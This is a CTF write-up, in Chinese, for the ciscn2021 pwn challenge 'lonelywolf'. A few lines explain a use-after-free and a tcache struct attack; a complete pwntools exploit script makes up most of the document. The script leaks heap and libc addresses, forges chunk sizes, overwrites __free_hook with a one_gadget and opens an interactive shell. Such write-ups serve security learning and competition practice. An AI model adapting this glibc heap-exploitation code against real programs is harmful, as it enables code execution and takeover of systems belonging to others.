ciscn2021 pwn-lonelywolf
简单题
保护全开
有一个很明显的uaf漏洞
add还限制了大小
攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。
第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。
因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用uaf将下面的堆块size伪造成0x91,这样再free之后会进入unsortedbin,之后tcache dup attack即可。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice: '
def add(index, size):
r.sendlineafter(menu, '1')
r.sendlineafter('Index: ', str(index))
r.sendlineafter('Size: ', str(size))
def edit(index, content):
r.sendlineafter(menu, '2')
r.sendlineafter('Index: ', str(index))
r.sendlineafter('Content: ', content)
def show(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Index: ', str(index))
def delete(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Index: ', str(index))
add(0, 0x78)
delete(0)
edit(0, b'\x00' * 0x10)
delete(0)
show(0)
r.recvuntil('Content: ')
heap_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x260
li('heap_base = ' + hex(heap_base))
edit(0, p64(heap_base + 0x10))
add(0, 0x78)
add(0, 0x78)
p1 = p32(0) + b'\x00\x01\x01\x07' + p64(0) * 12 + p64(heap_base + 0x250) + p64(heap_base + 0x260)
edit(0, p1)
add(0, 0x68)
p2 = p64(0) + p64(0x91) + p64(0)
edit(0, p2)
add(0, 0x30)
p3 = b'\x00' * 8 + p64(0x31)
edit(0, p3)
add(0, 0x78)
delete(0)
show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF(file_name).libc
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f3d5, 0x4f432, 0x10a41c]
one_gadget = one[2] + libc_base
add(0, 0x20)
delete(0)
edit(0, p64(free_hook))
add(0, 0x20)
add(0, 0x20)
edit(0, p64(one_gadget))
add(0, 0x20)
delete(0)
r.interactive()